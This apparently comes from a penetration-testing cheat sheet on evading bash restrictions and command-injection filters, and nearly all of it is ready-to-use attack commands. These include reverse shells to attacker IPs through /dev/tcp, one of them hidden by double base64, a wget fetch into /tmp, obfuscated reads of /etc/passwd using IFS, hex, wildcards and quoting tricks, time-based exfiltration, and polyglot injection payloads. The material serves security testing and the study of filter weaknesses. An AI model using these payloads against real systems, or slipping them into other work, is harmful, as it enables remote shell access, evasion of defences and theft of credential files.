Bypass Bash Restrictions

Reverse Shell

# Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
#echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h

Short Rev shell

#Trick from Dikline
#Get a rev shell with
(sh)0>/dev/tcp/10.10.10.10/443
#Then get the out of the rev shell executing inside of it:
exec >&0

Bypass Paths and forbidden words

# Question mark binary substitution
/usr/bin/p?ng # /usr/bin/ping
nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost
# Wildcard(*) binary substitution
/usr/bin/who*mi # /usr/bin/whoami
# Wildcard + local directory arguments
touch -- -la # -- stops processing options after the --
ls *
# [chars]
/usr/bin/n[c] # /usr/bin/nc
# Quotes / Concatenation
'p'i'n'g # ping
"w"h"o"a"m"i # whoami
\u\n\a\m\e \-\a # uname -a
ech''o test # echo test
ech""o test # echo test
bas''e64 # base64
/\b\i\n/////s\h
# Execution through $0
echo whoami|$0
# Uninitialized variables: an uninitialized variable expands to nothing (the empty string)
cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol
p${u}i${u}n${u}g # Equivalent to ping; use {} to place the uninitialized variables between valid characters
# Fake commands
p$(u)i$(u)n$(u)g # Equivalent to ping, but 3 errors from trying to execute "u" are shown
w`u`h`u`o`u`a`u`m`u`i # Equivalent to whoami, but 5 errors from trying to execute "u" are shown
# Concatenation of strings using history
!-1 # This will be substituted with the last command executed, and !-2 with the penultimate command
mi # This will throw an error
whoa # This will throw an error
!-1!-2 # This will execute whoami

Bypass forbidden spaces

# {form}
{cat,lol.txt} # cat lol.txt
{echo,test} # echo test
## IFS - Internal Field Separator; replace " " with any other character ("]" in this case)
cat${IFS}/etc/passwd # cat /etc/passwd
cat$IFS/etc/passwd # cat /etc/passwd
# Put the command line in a variable and then execute it
IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b
IFS=];b=cat]/etc/passwd;$b # Using 2 ";"
IFS=,;`cat<<<cat,/etc/passwd` # Using cat twice
# Other way, just change each space for ${IFS}
echo${IFS}test
# Using hex format
X=$'cat\x20/etc/passwd'&&$X
# New lines
p\
i\
n\
g # These 4 lines are equivalent to ping
## Undefined variables and !
$u $u # This is saved in the history and can be reused as a space; note that the $u variable is undefined
uname!-1\-a # This equals to uname -a

Bypass backslash and slash

cat ${HOME:0:1}etc${HOME:0:1}passwd
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd

Bypass with hex encoding

echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat abc
`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
cat `xxd -r -p <<< 2f6574632f706173737764`
xxd -r -ps <(echo 2f6574632f706173737764)
cat `xxd -r -ps <(echo 2f6574632f706173737764)`

Bypass IPs

# Decimal IPs
127.0.0.1 == 2130706433

Time based data exfiltration

time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi

DNS data exfiltration

You could use Burp Collaborator or pingb, for example.

Polyglot command injection

1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/

References & More

PayloadsAllTheThings/Command Injection at master · swisskyrepo/PayloadsAllTheThings
GitHub
GitHub - Bo0oM/WAF-bypass-Cheat-Sheet: Another way to bypass WAF Cheat Sheet (draft)
GitHub
Web Application Firewall (WAF) Evasion Techniques #2
Medium
Web Application Firewall (WAF) Evasion Techniques #3
Secjuice